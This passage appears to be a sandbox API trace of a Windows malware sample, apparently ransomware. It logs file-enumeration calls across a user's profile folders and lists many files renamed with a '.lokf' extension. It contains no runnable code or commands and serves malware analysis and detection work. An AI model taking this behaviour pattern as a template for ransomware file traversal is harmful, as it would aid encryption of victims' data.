ftLastWriteTime.dwLowDateTime=0x20659590, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x684a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B DJ6bHqinsD9h4.bmp.lokf", cAlternateFileName="BDJ6BH~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a851d00, ftCreationTime.dwHighDateTime=0x1d4cee2, ftLastAccessTime.dwLowDateTime=0xa52268c0, ftLastAccessTime.dwHighDateTime=0x1d4c686, ftLastWriteTime.dwLowDateTime=0x2067f6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xfd43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b7pJttHK9Z.jpg.lokf", cAlternateFileName="B7PJTT~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8225370, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x67fb63a0, ftLastAccessTime.dwHighDateTime=0x1d4cd90, ftLastWriteTime.dwLowDateTime=0x2067f6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13bdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eE0Pj7G5aEffKAC-zZKZ.jpg.lokf", cAlternateFileName="EE0PJ7~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90fef10, ftCreationTime.dwHighDateTime=0x1d4d30e, ftLastAccessTime.dwLowDateTime=0x6db0c130, ftLastAccessTime.dwHighDateTime=0x1d4c5e5, ftLastWriteTime.dwLowDateTime=0x206a5850, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xd43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOWcS-b-pHU1wro7.jpg.lokf", cAlternateFileName="EOWCS-~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01e38b0, ftCreationTime.dwHighDateTime=0x1d4c7d5, ftLastAccessTime.dwLowDateTime=0xcb2471c0, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x206cb9b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb379, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4kJhdDGPq3zd 8N.png.lokf", cAlternateFileName="G4KJHD~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fb3fe0, ftCreationTime.dwHighDateTime=0x1d4cf62, ftLastAccessTime.dwLowDateTime=0x309e1e50, ftLastAccessTime.dwHighDateTime=0x1d4ca45, ftLastWriteTime.dwLowDateTime=0x206f1b10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xfd4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4Ti7A LHpB.png.lokf", cAlternateFileName="H4TI7A~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bc51f0, ftCreationTime.dwHighDateTime=0x1d4cf20, ftLastAccessTime.dwLowDateTime=0x716b01e0, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0x206f1b10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf5d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsPblQOgWlR.jpg.lokf", cAlternateFileName="HSPBLQ~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b535f0, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0xf05a3ac0, ftLastAccessTime.dwHighDateTime=0x1d4c8e8, ftLastWriteTime.dwLowDateTime=0x20717c70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9b25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IIQQGpJ.gif.lokf", cAlternateFileName="IIQQGP~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74411580, ftCreationTime.dwHighDateTime=0x1d4c73a, ftLastAccessTime.dwLowDateTime=0x73ade950, ftLastAccessTime.dwHighDateTime=0x1d4d116, ftLastWriteTime.dwLowDateTime=0x2073ddd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8b1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lY0DCvr2.bmp.lokf", cAlternateFileName="LY0DCV~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb69c2b70, ftCreationTime.dwHighDateTime=0x1d4ccd7, ftLastAccessTime.dwLowDateTime=0x17ff2de0, ftLastAccessTime.dwHighDateTime=0x1d4d0e3, ftLastWriteTime.dwLowDateTime=0x2073ddd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5eac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mjvWTIfK-ga.gif.lokf", cAlternateFileName="MJVWTI~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94c82620, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0x94bfa4c0, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x20763f30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x18e7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkL4HKnkSYSJIwPNsR_.png.lokf", cAlternateFileName="OKL4HK~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0x21004ef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pt3T5YLjsfWTS8bTn", cAlternateFileName="PT3T5Y~1")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca7a240, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x539880a0, ftLastAccessTime.dwHighDateTime=0x1d4d2f9, ftLastWriteTime.dwLowDateTime=0x2078a090, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x158f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIK1-BUGPQEVJirKz6N.jpg.lokf", cAlternateFileName="RIK1-B~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d70800, ftCreationTime.dwHighDateTime=0x1d4d1f6, ftLastAccessTime.dwLowDateTime=0x8e210db0, ftLastAccessTime.dwHighDateTime=0x1d4c77c, ftLastWriteTime.dwLowDateTime=0x207b01f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x694a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZNT8ree-9bG.bmp.lokf", cAlternateFileName="RZNT8R~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6823c0, ftCreationTime.dwHighDateTime=0x1d4d3e4, ftLastAccessTime.dwLowDateTime=0x92bdb960, ftLastAccessTime.dwHighDateTime=0x1d4d387, ftLastWriteTime.dwLowDateTime=0x207b01f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xd330, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSPFwFmW70A.png.lokf", cAlternateFileName="TSPFWF~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5db5ed0, ftCreationTime.dwHighDateTime=0x1d4d18b, ftLastAccessTime.dwLowDateTime=0x1f2e2ea0, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x207d6350, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10ba9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urTk_7SAl.png.lokf", cAlternateFileName="URTK_7~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf65960, ftCreationTime.dwHighDateTime=0x1d4c5ba, ftLastAccessTime.dwLowDateTime=0x61fdf110, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x207fc4b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x107ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8xM.jpg.lokf", cAlternateFileName="V8XMJP~1.LOK")) returned 1 [0146.622] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc0430, ftCreationTime.dwHighDateTime=0x1d4d2e1, ftLastAccessTime.dwLowDateTime=0x3996550, ftLastAccessTime.dwHighDateTime=0x1d4cc33, ftLastWriteTime.dwLowDateTime=0x207fc4b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x183eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WX2M.gif.lokf", cAlternateFileName="WX2MGI~1.LOK")) returned 1 [0146.622] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 1 [0146.622] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0 [0146.622] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.622] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0146.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.622] PathFindFileNameW (pszPath="") returned="" [0146.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0xffffffff [0146.622] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0146.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.622] PathFindFileNameW (pszPath="") returned="" [0146.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif.lokf", cAlternateFileName="Y_DZ9Y~1.LOK")) returned 0xffffffff [0146.622] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0146.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.623] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.623] PathFindFileNameW (pszPath="") returned="" [0146.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.623] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.623] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.623] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0146.623] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.623] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0146.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.623] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.623] PathFindFileNameW (pszPath="") returned="" [0146.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.624] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.624] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.624] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0146.624] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0146.624] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0146.624] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.624] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0146.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.624] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.624] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.624] PathFindFileNameW (pszPath="") returned="" [0146.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0146.624] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0146.624] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.624] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.624] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.624] PathFindFileNameW (pszPath="") returned="" [0146.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0146.625] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0146.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.625] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.625] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.625] PathFindFileNameW (pszPath="") returned="" [0146.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0146.625] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0146.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.625] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.625] 